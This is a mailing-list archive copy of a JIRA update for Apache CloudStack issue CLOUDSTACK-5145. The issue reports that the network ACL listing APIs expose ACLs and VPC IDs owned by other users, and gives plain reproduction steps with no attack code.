cloudstack-issues mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Marcus Sorensen (JIRA)" <j...@apache.org>
Subject [jira] [Updated] (CLOUDSTACK-5145) ListNetworkACL API should list ACLs owned by the user only
Date Tue, 03 Dec 2013 17:14:36 GMT

     [ https://issues.apache.org/jira/browse/CLOUDSTACK-5145?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]

Marcus Sorensen updated CLOUDSTACK-5145:
----------------------------------------

    Description: 
ListNetworkACL API should filter ACLs by caller and list ACLs which can be accessed by the
user only. 

If API call is not called with a networkid or other filter, every ACL in the system is dumped,
which is both a performance issue and a security issue. If a networkid is provided, but the
network doesn't have an ACL list or any ACL items attached, the same issue occurs.

Likewise, listNetworkACLLists gives access to see non-owned lists, which in turn gives vpc
ids for non-owned resources.

Example:

1. Set up a zone
2. Create a VPC or network as admin
3. Create an ACL list for the network
4. Create a new domain and unprivileged user
5. Generate API keys for user
6. Issue a 'listNetworkACLs' API call. You should see the ACL list items from the admin-owned
list
7. Issue a 'listNetworkACLLists' API call referencing aclid from non-owned acl item. You should
see the acl list info and which vpc it belongs to. 
8. Listing the vpc attached to the acl list properly stops with an 'unauthorized' response
as step 7 above should.

  was:ListNetworkACL API should filer ACLs by user and list ACLs which can be accessed by
the user only


> ListNetworkACL API should list ACLs owned by the user only
> ----------------------------------------------------------
>
>                 Key: CLOUDSTACK-5145
>                 URL: https://issues.apache.org/jira/browse/CLOUDSTACK-5145
>             Project: CloudStack
>          Issue Type: Bug
>      Security Level: Public(Anyone can view this level - this is the default.) 
>            Reporter: Kishan Kavala
>            Assignee: Kishan Kavala
>            Priority: Blocker
>             Fix For: 4.2.1, 4.3.0
>
>
> ListNetworkACL API should filter ACLs by caller and list ACLs which can be accessed by
the user only. 
> If API call is not called with a networkid or other filter, every ACL in the system is
dumped, which is both a performance issue and a security issue. If a networkid is provided,
but the network doesn't have an ACL list or any ACL items attached, the same issue occurs.
> Likewise, listNetworkACLLists gives access to see non-owned lists, which in turn gives
vpc ids for non-owned resources.
> Example:
> 1. Set up a zone
> 2. Create a VPC or network as admin
> 3. Create an ACL list for the network
> 4. Create a new domain and unprivileged user
> 5. Generate API keys for user
> 6. Issue a 'listNetworkACLs' API call. You should see the ACL list items from the admin-owned
list
> 7. Issue a 'listNetworkACLLists' API call referencing aclid from non-owned acl item.
You should see the acl list info and which vpc it belongs to. 
> 8. Listing the vpc attached to the acl list properly stops with an 'unauthorized' response
as step 7 above should.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

Mime
View raw message